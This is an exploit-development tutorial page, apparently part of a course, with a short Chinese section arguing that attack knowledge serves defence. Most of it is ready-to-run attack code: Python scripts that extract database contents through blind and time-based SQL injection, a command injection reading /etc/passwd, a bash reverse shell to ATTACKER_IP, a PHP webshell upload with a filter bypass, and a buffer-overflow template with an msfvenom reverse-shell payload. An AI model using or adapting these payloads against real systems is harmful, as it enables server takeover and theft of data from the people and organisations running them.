Exploit Development
🔥 Vibe Prompt
"Develop exploit for Blind SQLi: extract DB name, tables, columns via boolean-based inference."
Blind SQLi Exploit
import requests
import string
URL = "http://target.com/item?id=1"
def check(condition):
"""Returns True if condition is true"""
payload = f"1 AND ({condition})"
r = requests.get(URL.replace("id=1", f"id={payload}"))
return "Item found" in r.text # Boolean oracle
# Extract DB version
db_version = ""
for i in range(1, 10):
for c in string.digits + ".":
if check(f"SUBSTR(version(),{i},1)='{c}'"):
db_version += c
print(f"DB version: {db_version}")
break
# Extract table names
tables = []
for i in range(1, 20): # Try first 20 tables
table_name = ""
for j in range(1, 30): # Max name length 30
found = False
for c in string.ascii_lowercase + "_":
if check(f"SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET {i-1}),{j},1)='{c}'"):
table_name += c
found = True
break
if not found:
if table_name:
tables.append(table_name)
print(f"Table {i}: {table_name}")
break
# Extract data from first table
data = ""
for i in range(1, 20):
for c in string.printable:
if c in ("'", "`"): continue
payload = f"SUBSTR((SELECT * FROM {tables[0]} LIMIT 1),{i},1)='{c}'"
if check(payload):
data += c
print(f"Data: {data}")
break
if len(data) < i: # No more data
break
Time-Based Blind SQLi
import requests, time
def time_check(condition):
payload = f"1; IF({condition}) WAITFOR DELAY '0:0:5'--"
start = time.time()
requests.get(URL.replace("id=1", f"id={payload}"), timeout=10)
return time.time() - start > 4 # >4s = true
# Exploit: check if admin exists
if time_check("SELECT COUNT(*) FROM users WHERE role='admin' > 0"):
print("Admin user exists!")
Command Injection Exploit
import requests
# Ping command injection
payload = "127.0.0.1; cat /etc/passwd"
r = requests.post("http://target.com/ping", data={"ip": payload})
if "root:" in r.text:
print("Command injection confirmed!")
# Extract all users
for line in r.text.split("\n"):
if ":" in line and not line.startswith("<!"):
print(f"User: {line.split(':')[0]}")
# Reverse shell
# Listen: nc -lvnp 4444
payload2 = "127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
File Upload Exploit
# Upload webshell
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "image/jpeg")}
r = requests.post("http://target.com/upload", files=files)
# Execute commands
r = requests.get(f"http://target.com/uploads/shell.php?cmd=id")
print(f"Command output: {r.text}")
# Better: use .phtml, .php5, .shtml (bypass extension filter)
files2 = {"file": ("shell.phtml", "<?=system($_GET['c'])?>", "image/jpeg")}
Buffer Overflow (Basic)
import socket
# EIP offset: 524 bytes
payload = b"A" * 524 # Fill buffer + EBP
payload += b"BBBB" # Overwrite EIP (control execution)
payload += b"\x90" * 32 # NOP sled
payload += shellcode # Your shellcode
s = socket.socket()
s.connect(("target.com", 9999))
s.send(payload + b"\r\n")
s.close()
Exploit Development Process
1. Fuzzing: find crash point (SPIKE, Peach)
2. Control: determine offset to EIP
3. Bad chars: identify bad bytes (\x00, \x0a)
4. Return: find JMP ESP address (mona.py)
5. Shellcode: generate with msfvenom
6. Exploit: assemble final payload
7. Test: debug with Immunity / WinDbg
Python Exploit Template
# !/usr/bin/env python3
import sys, socket
def exploit(target, port):
offset = 524
eip = b"\x42\x42\x42\x42"
# msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\x00\x0a" -f python
shellcode = b""
payload = b"A" * offset + eip + b"\x90" * 16 + shellcode
s = socket.socket()
s.connect((target, port))
s.send(payload)
s.close()
print(f"Exploit sent to {target}:{port}")
if __name__ == "__main__":
exploit(sys.argv[1], int(sys.argv[2]))
Best Practices
- Always use safe SEH/vectored exception handling
- Test exploit multiple times
- Add version/OS checks before exploitation
- Use Egghunters for limited buffer space
- Document exploit prerequisites
- Clean up artifacts after testing
漏洞利用開發:不只是攻擊,更是防禦
你可能覺得漏洞利用(Exploit Development)是駭客在用的東西。但事實上,了解如何攻擊是建立防禦的前提——你不知道攻擊者怎麼進來,就不知道該怎麼防。
漏洞利用的生命週期
發現漏洞 → 驗證是否存在 → 開發 PoC → 建立 Exploit → 回報/修補
專業的滲透測試人員不是為了破壞,而是為了:
- 證明漏洞可被利用:光說「這裡可能不安全」不夠,要實際展示如何入侵
- 評估風險等級:能遠端直接拿 Shell 的漏洞比要互動的漏洞嚴重得多
- 協助修補:提供 PoC 讓開發團隊複現問題並驗證修復
黑箱 vs 白箱測試
| 測試方式 | 已知資訊 | 適合階段 | |:--------|:--------|:--------| | 黑箱(Black Box) | 只知道目標網址 | 外部滲透測試、紅隊演練 | | 灰箱(Gray Box) | 知道部分架構和帳號 | 標準滲透測試 | | 白箱(White Box) | 原始碼和架構全開 | 程式碼審查、SDL 安全開發 |
下一章預告:Web 漏洞利用
這章學了漏洞利用開發的基礎概念。下一章將聚焦在 Web 應用最常見的漏洞——SQL Injection、XSS、SSRF,以及如何繞過常見的 WAF 防護。